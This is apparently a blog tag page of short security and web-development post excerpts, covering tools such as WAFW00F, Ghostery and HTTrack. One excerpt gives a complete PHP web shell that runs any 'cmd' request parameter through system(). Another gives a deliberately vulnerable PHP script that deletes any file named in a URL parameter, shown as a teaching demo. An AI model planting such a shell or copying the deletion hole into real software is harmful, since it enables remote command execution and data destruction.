Tag: web

C

Parsing JSON in C

jsmn is a minimalistic JSON parser in C. It can be easily integrated into resource-limited projects or embedded systems. Library sources are available at bitbucket.org/zserge/jsmn. Features: simple; highly portable (tested on x86/amd64, ARM, AVR); compatible with C89; no dependencies (even libc!); no dynamic memory allocation; extremely small code …

Detection, Firewall

How to detect Web Application Firewalls

WAFW00F – Web Application Firewall Detection Tool – identifies and fingerprints Web Application Firewall (WAF) products. To do its magic, WAFW00F does the following: it sends a normal HTTP request and analyses the response, which identifies a number of WAF solutions; if that is not successful, it sends a number of (potentially malicious) HTTP …

C#

How to make a Http Web Request properly using C#

    //..
    private HttpWebRequest _httpwebrequest;
    //..
    private void button1_Click(object sender, EventArgs e)
    {
        Thread t = new Thread(new ThreadStart(Test));
        t.IsBackground = true;
        t.Start();
    }

    public void Test()
    {
        Dictionary<String, String> dict = new Dictionary<String, String>(); …

PHP, Web Shell

A quick and dirty php web shell

    <?php
    if(isset($_REQUEST['cmd'])){
        echo "Command: <span style='color:red;'><b>".$_REQUEST['cmd']."</b></span> executed.";
        echo "<pre style='border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;'>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
    }

Injection, PHP, Vulnerabilities

PHP Command Injection Vulnerability in Web applications

Create a new PHP file, name it test_command_injection.php, and save it inside Apache’s htdocs directory:

    <?php
    if(isset($_GET['filename'])) {
        $filename = $_GET['filename'];
        if(file_exists($filename)) {
            unlink($filename);
        }
    }

Open your favorite browser and open the URL: http://localhost/test_command_injection.php?filename=path_to_file_4_deletion As you can see you could delete any file in the …

Anonymity, Detection, Firefox, Privacy, Protection

Defeat web trackers

Ghostery sees the “invisible” web, detecting trackers, web bugs, pixels, and beacons placed on web pages by Facebook, Google Analytics, and over 1,000 other ad networks, behavioral data providers, web publishers – all companies interested in your activity. After showing you who operates behind the scenes, Ghostery also gives you the opportunity to learn more …

Detection, Probing, WEB

Web Application Fingerprinter – Discover Web Application

The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable. SourceForge Project Page: https://sourceforge.net/projects/blindelephant/ Discussion and Forums: http://www.qualys.com/blindelephant License: LGPL …

Add-ons, Browsers, Firefox, Monitor, Proxy

Monitor the data you send to the remote server

TamperData is a Firefox addon to view and modify HTTP/HTTPS headers and post parameters, trace and time http response/requests and security test web applications by modifying POST parameters. TamperData allows you to see and/or modify the requests as they are sent to the website you navigate. It is a useful tool to discover the structure …

Browsers, Crawling, WEB

Offline browser utility

HTTrack is a free (GPL, libre/free software) and easy-to-use offline browser utility. It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site’s relative link-structure. Simply open a …